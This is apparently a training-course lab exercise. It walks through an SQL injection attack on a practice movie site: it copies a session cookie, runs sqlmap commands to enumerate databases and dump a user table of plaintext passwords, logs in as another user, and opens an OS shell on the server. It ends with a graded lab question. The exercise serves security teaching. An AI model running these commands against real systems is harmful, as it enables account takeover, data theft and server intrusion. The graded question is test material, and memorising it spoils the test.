Exercise 4: Perform an SQL Injection

Attack Against MSSQL to Extract

Databases using sqlmap
SQL injection is a technique used to take advantage of unsanitized input vulnerabilities to
pass SQL commands through a web application for execution by a backend database.

Lab Scenario

In SQL injection attacks, the attacker injects malicious SQL queries into the user input form
either to gain unauthorized access to a database or to retrieve information directly from the
database. Such attacks are possible because of a flaw in web applications and not because of
any issue with the database or a web server.

A security professional must have the required knowledge to perform an SQL injection attack
on the organization's website to check its security infrastructure.

Lab Objectives

This lab demonstrates how to perform an SQL injection attack using sqlmap.

Overview of SQL Injection

SQL injection attacks use a series of malicious SQL queries or SQL statements to manipulate
the database directly. Applications often use SQL statements to authenticate users, validate
roles and access levels, store and obtain information for the application and user, and link to
other data sources. SQL injection attacks work when an application does not properly
validate an input before passing it to an SQL statement.

Lab Tasks

In this lab, you will pretend that you are a registered user on http://www.moviescope.com
website and wish to crack the passwords of other users from the website’s database.

If you are already logged into the Attacker Machine-2, then skip to Step#3.

1. Click Attacker Machine-2 to switch to the Attacker Machine-2 machine.

2. In the login page, the attacker username will be selected by default. Enter password
as toor in the Password field and press Enter to log in to the machine.

If a Question pop-up window appears asking you to update the machine, click
No to close the window.
3. Click the Mozilla Firefox icon from the menu bar in the top-left corner of Desktop to
launch the web browser.
4. Type http://www.moviescope.com/ and press Enter. A Login page loads; enter the
Username and Password as sam and test, respectively. Click the Login button.

If a Would you like Firefox to save this login for moviescope.com?

notification appears at the top of the browser window, click Don’t Save.
5. After logging into the website, click the View Profile tab on the menu bar and, when
the page has loaded, note the URL in the address bar of the browser.
6. Right-click anywhere on the webpage and click Inspect Element (Q) from the
context menu, as shown in the screenshot below.
7. The Developer Tools frame appears in the lower section of the browser window.
Click the Console tab, type document.cookie in the lower-left corner of the browser,
and press Enter.
8. Select the cookie value, then right-click and copy it, as shown in the screenshot
below. Minimize the web browser.
9. Click the MATE Terminal icon at the top of the Desktop window to open a Parrot
Terminal window.
10. A Parrot Terminal window appears. In the terminal window, type sudo su and press
Enter to run the programs as a root user.
11. In the [sudo] password for attacker field, type toor as a password and press Enter.

The password that you type will not be visible.

12. Now, type cd and press Enter to jump to the root directory.
13. In the Parrot Terminal window, type sqlmap -u
"http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="[cookie value
that you copied in Step 8]" --dbs and press Enter.

In this query, -u specifies the target URL (the one noted down in Step 6), --
cookie specifies the HTTP cookie header value, and --dbs enumerates DBMS
databases.

14. The above query causes sqlmap to apply various injection techniques on the name
parameter of the URL in an attempt to extract the database information of the
MovieScope website.
15. If the message Do you want to skip test payloads specific for other DBMSes?
[Y/n] appears, type Y and press Enter.
16. If the message for the remaining tests, do you want to include all tests for
‘Microsoft SQL Server’ extending provided level (1) and risk (1) values? [Y/n]
appears, type Y and press Enter.
17. Similarly, if any other message appears, type Y and press Enter to continue.
18. sqlmap retrieves the databases present in the MSSQL server. It also displays
information about the web server OS, web application technology, and the backend
DBMS, as shown in the screenshot below.
19. Now, we will choose a database and use sqlmap to retrieve the tables in the database.
In this lab, we will determine the tables associated with the database moviescope.
20. Type sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --
cookie="[cookie value which you have copied in Step 8]" -D moviescope --tables
and press Enter.

In this query, -D specifies the DBMS database to enumerate and --tables

enumerates DBMS database tables.

21. The above query causes sqlmap to scan the moviescope database for tables.
22. sqlmap retrieves and displays the table contents of the moviescope, as shown in
screenshot below.
23. Now, we will retrieve the content of the column User_Login.
24. Type sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --
cookie="[cookie value which you have copied in Step 8]" -D moviescope -T
User_Login --dump and press Enter to dump all the User_Login table content.
25. sqlmap retrieves the complete User_Login table data from the database moviescope,
containing all users’ usernames under the Uname column and passwords under the
password column, as shown in screenshot below.
26. Under the password column, the passwords are shown in plain text.
27. To verify whether the login details are valid, attempt to log in with the extracted login
details of any of the users. To do so, switch back to the web browser, close the
Developer Tools console, and click Logout to start a new session on the site.
28. The Login page appears. Log in into the website using the retrieved credentials
john/qwerty.

If a Would you like Firefox to save this login for moviescope.com?

notification appears at the top of the browser window, click Don’t Save.
29. You will be successfully logged into the MovieScope website with john account, as
shown in the screenshot below.
30. Now, switch back to the Parrot Terminal window. Type sqlmap -u
"http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="[cookie value
which you have copied in Step 8]" --os-shell and press Enter.

In this query, --os-shell is the prompt for an interactive OS shell.

31. If the message do you want sqlmap to try to optimize value(s) for DBMS delay
responses appears, type Y and press Enter to continue.
32. Once sqlmap acquires the permission to optimize the machine, it will provide the OS
shell. Type hostname and press Enter to find the machine name where the site is
running.
33. If the message do you want to retrieve the command standard output? appears,
type Y and press Enter.
34. sqlmap will retrieve the hostname of the machine on which the target web application
is running, as shown in the screenshot below.
35. Type TASKLIST and press Enter to view the list of tasks currently running on the
target system.

If the message do you want to retrieve the command standard output?

appears, type Y and press Enter.
36. The above command retrieves the tasks and displays them under the command
standard output section, as shown in the screenshots below.
 37. Following the same process, various other commands can be used to obtain further
detailed information about the target machine.

To view the available commands under the OS shell, type help and press
Enter.

38. This concludes the demonstration of launching a SQL injection attack against
MSSQL to extract databases using sqlmap.
39. Close all open windows and document all the acquired information.

Question 2.4.1

In the Attacker Machine-2 machine, perform an SQL injection attack using the sqlmap tool
on the target website www.moviescope.com. Enumerate the DBMS databases and tables
associated with the target website. Dump the table content of the User_Login table and
identify the password associated with the username steve.